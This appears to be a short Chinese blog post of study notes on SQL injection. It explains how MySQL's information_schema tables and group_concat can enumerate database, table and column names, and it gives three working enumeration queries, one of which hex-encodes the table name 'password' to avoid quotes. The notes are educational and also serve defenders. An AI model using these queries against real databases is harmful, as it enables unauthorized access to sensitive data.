SQL注入中group_concat的学习笔记

这篇博客详细介绍了如何在SQL注入场景中利用information_schema结构,如Schemata、Tables和Columns,通过group_concat函数获取数据库名、表名和字段名。通过实例演示了获取敏感表名和字段名的技巧,适合深入理解SQL注入的安全防范与信息窃取手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入中group_concat的学习笔记


mysql中的information_schema 结构用来存储数据库系统信息
information_schema 结构中这几个表存储的信息,在注入中可以用到的几个表。


SCHEMATA :存储数据库名的,
——>关键字段:SCHEMA_NAME,表示数据库名称


TABLES :存储表名的

——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

——>关键字段:TABLE_NAME表示所属的表的名称


COLUMNS :存储字段名的

——>关键字段:COLUMN_NAME表示字段名


可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。

爆所有数据名

select group_concat(SCHEMA_NAME) from information_schema.schemata

得到当前库的所有表

select group_concat(table_name) from information_schema.tables where table_schema=database()

得到表中的字段名 将敏感的表进行16进制编码password=0x70617373776F7264

select group_concat(column_name) from information_schema.columns where table_name=0x70617373776F7264

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值